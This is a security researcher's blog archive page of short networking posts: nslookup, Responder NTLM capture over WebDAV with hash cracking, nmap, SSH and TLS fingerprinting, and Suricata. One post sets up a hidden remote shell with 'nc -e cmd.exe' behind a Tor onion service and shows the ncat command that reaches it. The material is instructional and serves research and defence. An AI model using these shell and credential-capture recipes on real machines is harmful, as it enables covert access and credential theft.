Didier Stevens

Wednesday 3 July 2019

Quickpost: nslookup Types

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

A reminder to myself, how to set a nslookup type via the command-line:

The label of the root domain is an empty string, hence a FQDN with root domain ends with a dot (.), like google.com. :


Quickpost info


Monday 20 May 2019

WebDAV, NTLM & Responder

Filed under: Encryption,Networking — Didier Stevens @ 0:00

I was trying to create a capture file with NTLM authenticated WebDAV traffic, using Responder: I couldn’t get it to work. There was WebDAV traffic, but no NTLMSSP headers.

Long story short: there’s a bug in Responder version 2.3.3.9. It manifests itself when the WebDAV client sends a request with just headers, and “Content-Length: 0”, like this:

The code in Responder “sees” just “Content-Length” and waits for more packets:

I made a quick & dirty fix: break out of the loop when we see “Content-Length: 0” (servers/HTTP.py):

And now I have NTLMSSP headers:

I just start my modified version of Responder:

Generate WebDAV traffic from a Windows 7 client:

And Responder participates in the challenge:

This can of course be cracked (if the password is not too complex), with John The Ripper for example:

I also have a blog post with more details about WebDAV traffic from Windows clients.

Once I got Responder to work, I searched on Laurent’s Responder repository, and found a pull-request to fix issues with “Content-Length: 0” requests (this PR has not been merged yet). Hence I’m not going to do my own PR.

You can find the capture file here:

webdav-ntlm-responder.zip (https)
MD5: A427DDBDAF090E93BB75B7A8DE696826
SHA256: 2F92CDD7382DD3622AC1F8769CF9D065C60C235DEF764E6709C32E2C4A7554A8

Sunday 19 May 2019

Quickpost: Retrieving an SSL Certificate with nmap

Filed under: Encryption,Networking,Quickpost — Didier Stevens @ 8:28

One of my first quickposts, more than 10 years ago, was an howto: using openssl to retrieve the certificate of a web site.

Since then, nmap has a scripting engine, and there is a script to check a certificate with nmap: ssl-cert.nse.

You just have to scan the site and port for which you want to check the certificate, like this: nmap -p 443 –script ssl-cert didierstevens.com

If you want the certificate too, increase verbosity with option -v:

Checking a certificate will not work if you scan a port that is not known to provide SSL/TLS:

In that case, you have to use service discovery (-sV):

 


Quickpost info


Wednesday 10 October 2018

KEIHash: Fingerprinting SSH

Filed under: Encryption,My Software,Networking — Didier Stevens @ 0:00

keihash.py is a program to parse pcap files and calculate the KEIHash of SSH connections.

The KEIHash is the MD5 hash of the Key Exchange Init (KEI) data (strings). For obvious reasons, I could not call this an SSH fingerprint. This is inspired by JA3 SSL fingerprinting.

It can be used to profile SSH clients and servers. For example, the hash for the latest version of PuTTY (SSH-2.0-PuTTY_Release_0.70) is 1c5eaa56f3e4569385ae5f82a54715ee.

This is the MD5 hash of:

240-curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,rsa2048-sha256,rsa1024-sha1,diffie-hellman-group1-sha1;87-ssh-rsa,ssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-dss;189-aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,chacha20-poly1305@openssh.com,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc,arcfour256,arcfour128;189-aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,chacha20-poly1305@openssh.com,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc,arcfour256,arcfour128;155-hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com;155-hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com;9-none,zlib;9-none,zlib;0-;0-

These are all the strings found in the Key Exchange Init packet, prefixed by their length and concatenated with separator ;.

With this, I’ve been able to identify SSH clients with spoofed banners attempting to connect to my servers.

keihash_V0_0_1.zip (https)
MD5: 674D019A739679D9659D2D512A60BDD8
SHA256: DB7471F1253E3AEA6BFD0BA38C154AF3E1D1967F13980AC3F42BB61BBB750490

Saturday 18 August 2018

Quickpost: Revisiting JA3

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

A year ago I tried out JA3. Time for a new test.

This new version no longer crashes on some packets, it’s more stable. However, there’s a bug when producing json output, which is easy to fix.

The JA3 Python program no longer matches TLS fingerprints: it produces a list of data (including fingerprint) for each client Hello packet.

Running this new version on the same pcap file as a year ago (and extracting the fingerprints) yields exactly the same result: 445 unique fingerprints, 7588 in total.

I have more matches this time when matching with the latest version of ja3fingerprint.json: 75 matches compared to 24 a year ago.

Notice that Shodan is one of the matched fingerprints.

Let’s take a closer look:

I’m looking for connections with fingerprint digest 0b63812a99e66c82a20d30c3b9ba6e06:

80.82.77.33 is indeed Shodan:

Name: sky.census.shodan.io
Address: 80.82.77.33


Quickpost info


Tuesday 3 April 2018

Quickpost: Email Server Simulator

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

I needed an email server simulator to test a script I’m writing (a simple email honeypot), and found GreenMail.

It’s a Java application and can thus run on Windows too:

This is the command I used:

java -Dgreenmail.setup.test.all -Dgreenmail.users=testuser1:P#ssw0rd@example.com,testuser2:P#ssw0rd@example.com -Dgreenmail.verbose -Dgreenmail.auth.disabled -jar greenmail-standalone-1.5.7.jar

This command starts all servers (SMTP, POP3, IMAP) on the default ports + 3000 (3025, 3110, …).

I configured 2 user mailboxes, enabled verbosity and disabled authentication.

To send emails to my script, I used Outlook:

Since everything is running on the same machine using localhost (127.0.0.1), I’m using Npcap so that I can capture loopback traffic with Wireshark (WinPcap can not capture loopback traffic).

 


Quickpost info


Tuesday 27 March 2018

Quickpost: Using Suricata on Windows

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

I like to be able to get work done, regardless of the machine I’m using. That’s why I installed Suricata on Windows to help me develop rules.

Here is the process:

Installing Suricata with default settings:

Now that I installed Suricata in the programs folder, I’m going to create a folder with my configurations, rules and test captures. Let’s say that folder is C:\Suricata.

In that folder, I create folders log, rules and projects.

In folder rules, I copy the content of the rules folder in the Suricata programs directory.

threshold.config is an empty file, and suricata.yaml is a copy of suricata.yaml found inside the Suricata programs directory.

You can find the modifications I make to suricata.yaml on GitHub. Of course, you can make more configuration changes, this is just a minimum.

Then, for each project or test, I create a folder in folder projects. Like this mimikatz folder:

I use the following BAT file to start Suricata with my rules and my capture file:

“C:\Program Files (x86)\Suricata\suricata.exe” -c ..\..\suricata.yaml -S mimikatz.rules -l logs -k none -v -r drsuapi-DsGetNCChanges.pcap
pause

With option -S I use my rule file mimikatz.rules (exclusively, no other rule file will be loaded), option -l logs uses my local logs directory to write the log files, -k none disable checksum checks, -v means verbose and -r .pcap reads my capture file for processing by Suricata.

If you get this error:

you need to install WinPcap. Here is the installation with default options:

Then you will get output like this:

When you use option -s in stead of -S, your rule will be loaded together with the rules configured in the configuration file. This will give you warnings, because the rule files are missing:

You can download rules from Emerging Threats and extract the files from the rules folder to your C:\Suricata\rules folder.

Of course, you can also process your capture file without explicit rule:

Please post a comment if you want to share your own preferred configuration options.

 


Quickpost info


Tuesday 27 February 2018

Wireshark Comments

Filed under: Networking,Wireshark — Didier Stevens @ 0:00

For NVISO, I’m providing Wireshark training at BruCON Spring 2018: Wireshark and Lua Programming.

In the following video, I show how to add comments to packets and capture files in Wireshark:

Monday 26 February 2018

Quickpost: Using nmap With Tallow (Tor proxy)

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

Here’s how I used nmap with Tallow on Windows, a transparent Tor proxy:

ICMP is not supported by the Tor network (hence -Pn) neither SYN scanning (hence TCP scanning -sT).

Flag “Force web-only” blocks all ports except 80 and 443, hence why port 22 is filtered.

 


Quickpost info


Monday 5 February 2018

Quickpost: Remote Shell On Windows Via Tor Onion Service

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

Creating a Tor onion service (aka hidden service) on a Windows Tor client.

I download the Tor expert bundle (this works with the Tor Browser too).

I create Tor configuration file torrc with these lines:

HiddenServiceDir C:\demo\Tor\service
HiddenServicePort 8662 127.0.0.1:12345

When Tor is started, folder C:\demo\Tor\Service will be created and populated with a couple of files (file hostname contains the .onion address created by Tor for this onion service).

The onion service will be listening on port 8662, and traffic will be forwarded to 127.0.0.1 port 12345.

It is possible to enable client authorization for this service (without client authorization, everybody who knows the .onion address and the port can connect to it). Basic client authorization uses a shared secret, and is configured with this line (torrc):

HiddenServiceAuthorizeClient basic testuser

I choose testuser as name for the client.

I start Tor with configuration file torrc like this: tor.exe -f torrc

The .onion address and client authorization cookie can be found in file hostname in the service folder:

nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g # client: testuser

Keep the authorization cookie secret of course, I show it here for the demo.

Now start the service on the target Windows machine with nc.exe (I downloaded nc.exe years ago, I don’t have the original URL anymore, my version is 1.11 with MD5 ab41b1e2db77cebd9e2779110ee3915d):

nc -e cmd.exe -L -s 127.0.0.1 -p 12345

Tor expert bundle and nc.exe have no extra dependencies (like DLLs), and can be executed as normal user.

Now the target machine is ready.

On another machine, I start Tor with a configuration file containing the authorization cookie:

HidServAuth nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g

And then I run ncat, because ncat.exe supports socks5 proxies (nc.exe doesn’t):

ncat.exe --proxy 127.0.0.1:9050 --proxy-type socks5 nybjuivgocveiyeq.onion 8662

This gives me a remote shell:

Remark that this does not work with version 7.60, apparently because of a regression bug:

libnsock select_loop(): nsock_loop error 10038: An operation was attempted on something that is not a socket.

 


Quickpost info


Next Page »

Blog at WordPress.com.